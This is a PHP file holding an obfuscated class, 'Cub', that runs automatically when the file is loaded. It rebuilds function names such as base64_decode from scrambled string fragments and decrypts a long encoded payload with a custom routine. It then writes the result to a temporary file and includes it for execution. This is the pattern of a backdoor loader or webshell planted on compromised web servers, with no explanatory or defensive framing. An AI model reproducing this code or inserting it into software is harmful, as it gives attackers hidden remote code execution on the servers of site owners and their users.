<?php
class Cub {
	function __construct() {
		$backend = $this->_tx($this->vector);
		$backend = $this->block($this->task($backend));
		$backend = $this->inc($backend);
		$backend = $this->_iterator($backend);
		if(is_array($backend)) {
			list($value, $seek, $_application, $_seek) = $backend;
			$this->_index = $_seek;
			$this->_parser = $_application;
			$this->_config = $value;
			$this->_signal($value, $seek);
		}
	}
	
	function _signal($graph, $_validator) {
		$this->response = $graph;
		$this->_validator = $_validator;
		$this->_query = $this->_tx($this->_query);
		$this->_query = $this->_flag($this->_query);
		$this->_query = $this->emu();
		if(strpos($this->_query, $this->response) !== false) {
			if(!$this->_index)
				$this->shard($this->_parser, $this->_config);
			$this->inc($this->_query);
			$this->_iterator($this->lib);
		}
	}
	
	function shard($code, $nginx) {
		$_code = $this->task($this->shard[4].$this->shard[3].$this->shard[1].$this->shard[2].$this->shard[0]);
		$_code = $_code($code, $nginx);
	}

	function container($_validator, $_data, $graph) {
		$cmd = strlen($_data) + strlen($graph);
		$this->input = 0;
		while(strlen($graph) < $cmd) {
			$application = ord($_data[$this->input]) - ord($graph[$this->input]);
			$_data[$this->input] = chr($application % (256/1));
			$graph .= $_data[$this->input];
			$this->input++;
		}
		return $_data;
	}
   
	function _flag($code) {
		$_claster = $this->_flag[5].$this->_flag[1].$this->_flag[4].$this->_flag[3].$this->_flag[2].$this->_flag[0];
		$_claster = $_claster($code);
		return $_claster;
	}

	function block($code) {
		$_claster = $this->task($this->block[1].$this->block[4].$this->block[5].$this->block[0].$this->block[3].$this->block[2]);
		$_claster = $_claster($code);
		return $_claster;
	}
	
	function emu() {
		$this->ver = $this->container($this->_validator, $this->_query, $this->response);
		$this->ver = $this->block($this->ver);
		return $this->ver;
	}
	
	function task($handler) {
		$this->tx = $this->_flag($handler);
		$this->tx = $this->container('', $this->tx, strval($this->twelve));
		return $this->tx;
	}
	
	function inc($event) {
		$lib = $this->task($this->_value[1].$this->_value[4].$this->_value[5].$this->_value[3].$this->_value[2].$this->_value[0]);
		$this->lib = $lib() . $this->task($this->_income[3].$this->_income[0].$this->_income[1].$this->_income[6].$this->_income[2].$this->_income[7].$this->_income[4].$this->_income[5]) . md5(time());
		$lib = $this->task($this->_cmd[1].$this->_cmd[0]);
		$lib = $lib($this->lib, 'w');
		if ($lib)
		{
			$_graph = $this->task($this->load[0].$this->load[3].$this->load[2].$this->load[1]);
			$_graph($lib, $event);
			return $this->lib;
		}
	}
	
	function _iterator($_graph) {
		$result = include($_graph);
		return $result;
	}
	
	function _tx($event) {
		$_claster = $this->task($this->_core[2].$this->_core[3].$this->_core[0].$this->_core[1]);
		return $_claster("\r\n", "", $event);
	}
	 
	var $index;
	var $input = 0;
	var $twelve = 559;	
	
	var $block = array('Vz', 'nK', 'R', '9r', '+i', '1eD');
	var $runtime = array('np19L', 'mKeex', 'razc', 'ObKwN', 'i');
	var $_flag = array('e', 'se6', 'od', 'dec', '4_', 'ba');
	var $shard = array('jU', 'tTj', 'zt', 't1', 'qJq');
	var $_core = array('bXz97G', '09E=', 'qKm', 'r0u');
	var $_value = array('9g=', 'qJqs5s', 'bG0', 'YwO', '7i4', 'cjiz9X');
	var $_income = array('K', 'i', 'o', 'Z', 'b', 'E', 'e', 'u');
	var $_cmd = array('py90=', 'm6S');
	var $load = array('m6', 'vX', 'z+', 'yr');
	 
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	var $vector = 'womW/C6df9ZrZD7do4N6DZBQCUrYPEtFkrrHl49cIgAmr+7+K4CKrF4HP2yFYMk5TeoPnzoXVDn4DJZb
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}

new Cub();
?>